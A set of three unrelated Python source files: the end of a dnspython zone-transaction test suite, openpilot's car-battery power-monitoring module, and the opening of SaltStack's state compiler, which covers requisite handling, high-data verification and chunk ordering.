txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_iteration_in_replacement_txn(zone):
rds = dns.rdataset.from_text('in', 'a', 300, '1.2.3.4', '5.6.7.8')
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_commit(zone):
rds = dns.rdataset.from_text('in', 'a', 300, '1.2.3.4', '5.6.7.8')
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
with zone.reader() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_get(zone):
with zone.writer(True) as txn:
rds = txn.get(dns.name.empty, 'soa')
assert rds is None
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0
MAX_TIME_OFFROAD_S = 8*3600
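# Editor's sketch (not part of the original module): the low-pass gain above
# follows k = (dt/tau) / (dt/tau + 1); assuming calculate() runs roughly every
# 0.5 s with a 5 s time constant, k = 0.1 / 1.1 ~= 0.091, matching the constant.
def _example_low_pass_gain(dt=0.5, tau=5.0):
    return (dt / tau) / (dt / tau + 1)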
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
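# Editor's sketch (not part of the original module): a worked example of the
# integration done in _perform_integration -- power in W times 1e6 gives uW,
# and multiplying by the elapsed time in hours gives uWh.
def _example_energy_integration():
    current_power_w = 5.0   # assumed offroad draw, for illustration only
    elapsed_s = 1800.0      # half an hour
    power_used_uwh = (current_power_w * 1e6) * (elapsed_s / 3600)
    assert power_used_uwh == 2.5e6  # i.e. 2.5 Wh
    return power_used_uwh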
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
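# For example (hypothetical requisite), trim_req({'pkg.installed': 'vim'})
# returns {'pkg': 'vim'}, while a requisite without a function part, such as
# {'pkg': 'vim'}, is returned unchanged.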
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
    Scan high data for the id referencing the given name and return a list of (ID, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
    Scan for all ids in the given sls and return them as a list of (id, state) tuples
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # Is this a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
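    # Illustrative pad_funcs() behavior (hypothetical SLS data): a short
    # declaration {'vim': 'pkg.installed'} becomes {'vim': {'pkg': ['installed']}},
    # and a dotted key {'vim': {'pkg.installed': [{'version': '2:8.0'}]}} becomes
    # {'vim': {'pkg': [{'version': '2:8.0'}, 'installed']}}.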
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
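    # How ordering resolves in practice (illustrative chunks only): given
    # explicit orders of 3, 'last' and 'first' plus one chunk with no order,
    # cap becomes 103, the unordered chunk gets order 103, 'first' maps to 0
    # and 'last' maps to cap + 1000000, so the final sort is:
    # first (0), 3, unordered (103), last (1000103).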
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
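    # Sketch of the high -> low transformation above (hypothetical input):
    #     {'motd': {'file': ['managed', {'user': 'root'}], '__sls__': 'base'}}
    # yields a single chunk roughly like:
    #     {'state': 'file', '__id__': 'motd', 'name': 'motd', '__sls__': 'base',
    #      'user': 'root', 'fun': 'managed', 'order': <assigned by order_chunks>}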
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
            # There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
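    # Example exclude handling (illustrative): if high['__exclude__'] is
    # ['common', {'id': 'motd'}], every ID whose '__sls__' is 'common' is
    # dropped from the high data, along with the ID 'motd' itself.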
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
